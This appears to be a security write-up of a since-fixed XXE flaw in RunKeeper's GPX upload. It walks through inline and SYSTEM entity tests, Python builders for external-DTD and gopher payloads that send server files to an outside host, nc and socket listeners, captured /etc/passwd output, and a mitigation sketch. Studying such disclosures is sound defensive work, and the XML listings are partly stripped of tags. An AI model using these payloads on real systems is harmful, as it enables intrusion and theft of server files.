Identifying Xml eXternal Entity vulnerability (XXE)

Here is a short writeup on how an XXE vulnerability was discovered on the website RunKeeper.com. The website, as the name suggests, keeps track of your training sessions (running, cycling, skiing, etc.). The vulnerabilities presented here were fixed on June 10th, 2014.

The website accepts the upload of GPX files. A GPX file is an XML document containing a list of positions with the instantaneous speed, time and elevation.

GPX file

Here is an example of a GPS file in the GPX format. The only important aspect is that it is XML-based.

2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000
  
  
    22.600000
    2014-06-07T18:06:16Z
    0.000000
  
  [...]
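To make the structure concrete, here is a minimal Python sketch that reads track points from a GPX-like document. The element names (`trkpt`, `ele`, `time`, `speed`), the `lat`/`lon` values and the `read_points` helper are assumptions for illustration. Real GPX files normally declare an XML namespace, which this sketch omits.

```python
import xml.etree.ElementTree as ET

# Hypothetical sample: element names and coordinates are assumed for illustration.
SAMPLE_GPX = """<gpx>
  <metadata><time>2014-06-07T20:04:44.453Z</time></metadata>
  <trk><trkseg>
    <trkpt lat="0.0" lon="0.0">
      <ele>22.600000</ele>
      <time>2014-06-07T18:06:16Z</time>
      <speed>0.000000</speed>
    </trkpt>
  </trkseg></trk>
</gpx>"""


def read_points(gpx_text):
    """Return one dict per track point; all three child elements are expected."""
    root = ET.fromstring(gpx_text)
    points = []
    for point in root.iter("trkpt"):
        points.append({
            "ele": float(point.findtext("ele")),
            "time": point.findtext("time"),
            "speed": float(point.findtext("speed")),
        })
    return points
```

Only the numeric fields and timestamps are read here, which mirrors the kind of server-side processing that makes a blind test necessary later on.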

Attack potential

When user-supplied XML is parsed server-side, the first thing that should come to mind is XXE attacks. XXE stands for Xml eXternal Entity. These attacks have gained momentum recently following various publications.

Note that this article doesn't explain XXE in depth. It focuses on tips and a methodology to identify the vulnerability and the parser's capabilities. The tests presented are those that were effective on the old version of RunKeeper.

Step 1 : Confirmation that entities are interpreted

In our first attempt, we need to confirm that entities are interpreted in their most basic form. We replace a value with an inline entity. If the file loads properly, then the replacement must have occurred.

]>

2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000
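The same check can be reproduced locally. The Python sketch below declares an inline entity, references it in place of the elevation, and confirms that the parser substituted the value. The entity name `probe`, the GPX element names and both helper names are hypothetical. It only illustrates the principle and says nothing about how RunKeeper's Java parser was configured.

```python
import xml.etree.ElementTree as ET


def build_inline_probe(value="22.600000"):
    """Return a GPX-like document whose elevation comes from an inline entity."""
    return (
        f'<!DOCTYPE gpx [<!ENTITY probe "{value}">]>\n'
        "<gpx><trk><trkseg>\n"
        '  <trkpt lat="0.0" lon="0.0">\n'
        "    <ele>&probe;</ele>\n"
        "    <time>2014-06-07T18:06:16Z</time>\n"
        "  </trkpt>\n"
        "</trkseg></trk></gpx>"
    )


def resolved_elevation(document):
    """Parse the document and return the text the parser put inside <ele>."""
    root = ET.fromstring(document)
    return root.findtext(".//ele")
```

If `resolved_elevation(build_inline_probe())` returns the declared value rather than failing, inline entities are being expanded by that parser.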
  

Step 2 : Confirmation that SYSTEM entities are usable

We can now try loading external resources from a host we control. The resources can be hosted on an HTTP server, an FTP server or even a Samba share in the case of an intranet application.

RunKeeper only looks at positions, times and other numeric values. The string values from the metadata are not used. Therefore, it is not possible to get a direct response after the upload of a GPX file.

If the destination is a server we control, we will receive a connection if external entities are enabled. Assuming strict firewall restrictions are in place, all common ports should be tested (23, 80, 443, 8080, ...).

evil.gpx

]>

&xxe; 2014-06-07T20:04:44.453Z

    22.600000
    2014-06-07T18:06:16Z
    0.000000
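Since several ports may need to be tried, the probe files can be generated rather than edited by hand. A rough Python sketch follows. The host name `attacker.example`, the `name` element carrying the entity and the helper names are hypothetical; only the entity name `xxe`, the `/ping_me` path and the port list come from this article.

```python
# Ports suggested in the text; extend as needed.
COMMON_PORTS = (23, 80, 443, 8080)


def build_callback_probe(host, port, path="/ping_me"):
    """Return a GPX-like document whose SYSTEM entity points at host:port."""
    url = f"http://{host}:{port}{path}"
    return (
        f'<!DOCTYPE gpx [<!ENTITY xxe SYSTEM "{url}">]>\n'
        "<gpx><metadata><name>&xxe;</name></metadata></gpx>"
    )


def build_port_sweep(host, ports=COMMON_PORTS):
    """Return a mapping of port number to probe document."""
    return {port: build_callback_probe(host, port) for port in ports}
```

Each generated document is uploaded in turn while watching the corresponding port on the controlled host.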

Right after the upload, our server receives the following request. SYSTEM entities are now confirmed.

74.50.53.234 - - [08/Jun/2014:00:36:55 -0400] "GET /ping_me HTTP/1.1" 200 77 "-" "Java/1.6.0_26"
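The User-Agent in that log line is worth recording, since it reveals the client library and its version. A small Python sketch for pulling the fields apart, assuming the server writes the usual Apache combined log format (the regular expression and the field names are illustrative):

```python
import re

# Combined log format: ip, identity, user, [time], "request", status, size,
# "referer", "user agent".
LOG_LINE = re.compile(
    r'(?P<ip>\S+) \S+ \S+ \[(?P<when>[^\]]+)\] '
    r'"(?P<request>[^"]*)" (?P<status>\d{3}) (?P<size>\S+) '
    r'"(?P<referer>[^"]*)" "(?P<agent>[^"]*)"'
)


def parse_callback(line):
    """Return the log fields as a dict, or None if the line does not match."""
    match = LOG_LINE.match(line)
    if match is None:
        return None
    fields = match.groupdict()
    # Split "METHOD target PROTOCOL"; the target itself may contain spaces.
    method, _, rest = fields["request"].partition(" ")
    target, _, _protocol = rest.rpartition(" ")
    fields["method"] = method
    fields["target"] = target
    return fields
```

Splitting the request from both ends keeps targets that contain spaces intact, which matters once file contents start appearing in the query string.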

Step 3 : Test for external DTD availability to exfiltrate data

A cool trick discovered by the researchers Alexey Osipov and Timur Yunusov allows the construction of a URL with data coming from other entities.

evil1.gpx

%dtd;]>

&send; [....]

http://xxe.me/evil1.dtd

"> %all;

Following the upload, we then received the following request:

74.50.62.56 - - [08/Jun/2014:00:51:41 -0400] "GET /content?Debian GNU/Linux 7 \x5Cn \x5Cl HTTP/1.1" 200 251 "-" "Java/1.6.0_26"

In practice, the previous technique is not perfect. Any file containing XML-incompatible characters (&, \n, \x80, etc.) would break the URL. /etc/issue is one of the rare files that is safe to include.
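For reference, the pair of files used in this step can be sketched in Python as below. The entity names `dtd`, `send` and `all`, the DTD URL and the `/content?` path come from the listings and the log line in this step. The `payload` entity name, the `name` element and the helper itself are assumptions.

```python
def build_oob_pair(dtd_url, sink_url, target="file:///etc/issue"):
    """Return (uploaded_document, external_dtd) for the out-of-band test."""
    document = (
        f'<!DOCTYPE gpx [<!ENTITY % dtd SYSTEM "{dtd_url}"> %dtd;]>\n'
        "<gpx><metadata><name>&send;</name></metadata></gpx>"
    )
    # The external DTD reads the target into %payload;, then declares the
    # general entity `send` whose URL embeds that content.
    external_dtd = (
        f'<!ENTITY % payload SYSTEM "{target}">\n'
        f"<!ENTITY % all \"<!ENTITY send SYSTEM '{sink_url}?%payload;'>\">\n"
        "%all;"
    )
    return document, external_dtd
```

The indirection through the external DTD is what makes this work: a parameter entity reference may appear inside an entity value only in the external subset, not in the DOCTYPE of the uploaded file itself.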

Step 4 : Test for external DTD with gopher protocol

We still have an option to fetch arbitrary files. An attentive reader will have noticed that the remote JVM version was captured in step 2. The version is Java 1.6 update 26. The gopher protocol was disabled in version 1.6 update 37 [Ref]. The gopher protocol can be used to open a TCP connection and send arbitrary data.

gopher://remote_host:remote_port/?ARBITRARY_DATA
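The reasoning above can be turned into a quick check plus a DTD generator. This Python sketch takes the update-37 threshold from this article as given and only reasons about `Java/1.6.0_NN` User-Agent strings; any other version is treated as unknown. The `payload` entity name, the default `/etc/passwd` target and the helper names are assumptions.

```python
import re

# Per this article, gopher was disabled in Java 1.6 update 37.
GOPHER_DISABLED_IN_UPDATE = 37


def java6_update(user_agent):
    """Return the update number from a 'Java/1.6.0_NN' User-Agent, else None."""
    match = re.fullmatch(r"Java/1\.6\.0_(\d+)", user_agent)
    return int(match.group(1)) if match else None


def gopher_likely_available(user_agent):
    """True only for Java 1.6 builds older than the threshold above."""
    update = java6_update(user_agent)
    return update is not None and update < GOPHER_DISABLED_IN_UPDATE


def build_gopher_dtd(host, port, target="file:///etc/passwd"):
    """Return an external DTD that sends the target's content over gopher."""
    sink = f"gopher://{host}:{port}/?%payload;"
    return (
        f'<!ENTITY % payload SYSTEM "{target}">\n'
        f"<!ENTITY % all \"<!ENTITY send SYSTEM '{sink}'>\">\n"
        "%all;"
    )
```

For the User-Agent captured earlier, `gopher_likely_available("Java/1.6.0_26")` evaluates to true, which is what justifies trying this step at all.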

evil2.gpx

%dtd;]>

&send; [....]

http://xxe.me/evil2.dtd

"> %all;

Following the upload of the first file, an incoming connection is opened and the file content is received.

$ nc -nlvk 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [74.50.53.234] port 1337 [tcp/*] accepted (family 2, sport 42321)
xe?root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
[...]

Files can be fetched and directories can be listed. For example, the entity "file:///" will return the root directory:

$ nc -nlvk 1337
Listening on [0.0.0.0] (family 0, port 1337)
Connection from [74.50.58.179] port 1337 [tcp/*] accepted (family 2, sport 52827)
xe?.rpmdb
.ssh
bin
boot
dev
etc
home
initrd.img
lib
lib32
lib64
lost+found
media
mnt
opt
proc
root
sbin
selinux
[...]
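If `nc` is not available, the receiving side can be approximated with a few lines of Python. This is a rough sketch rather than a replacement for the command above: it accepts a single connection and returns whatever bytes arrive. Port 1337 matches the example; the function names and the size and timeout limits are hypothetical.

```python
import socket


def open_listener(port=1337, host="0.0.0.0"):
    """Bind a TCP socket and start listening; the caller closes it."""
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
    server.bind((host, port))
    server.listen(1)
    return server


def receive_once(server, max_bytes=65536, timeout=5.0):
    """Accept one connection and return (peer_ip, received_bytes)."""
    connection, (peer_ip, _peer_port) = server.accept()
    chunks = []
    total = 0
    with connection:
        connection.settimeout(timeout)
        while total < max_bytes:
            try:
                chunk = connection.recv(4096)
            except socket.timeout:
                break  # peer went quiet; keep what we have
            if not chunk:
                break  # peer closed the connection
            chunks.append(chunk)
            total += len(chunk)
    return peer_ip, b"".join(chunks)
```

Typical use is `server = open_listener()` followed by `receive_once(server)` right before uploading the file.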

Mitigations

To resolve this issue, two changes needed to be applied. SYSTEM entities were disabled for the parsing of GPX files. Also, the Java Virtual Machine was updated to benefit from previous security updates, including the gopher protocol being disabled by default.
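The actual fix was made in RunKeeper's Java parser and its code is not shown here. As a language-neutral illustration of a stricter variant of the first change, the Python sketch below refuses any upload that carries a DOCTYPE declaration at all, so no entity (inline or SYSTEM) can be declared. The exception class and function name are hypothetical.

```python
import xml.parsers.expat


class DoctypeForbidden(ValueError):
    """Raised when an uploaded document carries a DOCTYPE declaration."""


def reject_doctype(xml_bytes):
    """Scan the document once and raise DoctypeForbidden on any DOCTYPE."""
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        # Called by expat as soon as it meets "<!DOCTYPE ...".
        raise DoctypeForbidden(f"DOCTYPE {name!r} is not allowed in uploads")

    parser.StartDoctypeDeclHandler = on_doctype
    # Malformed input still raises xml.parsers.expat.ExpatError here.
    parser.Parse(xml_bytes, True)
```

Rejecting the DOCTYPE outright is blunter than disabling only external entities, but GPX uploads have no need for a DTD, so little is lost.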

References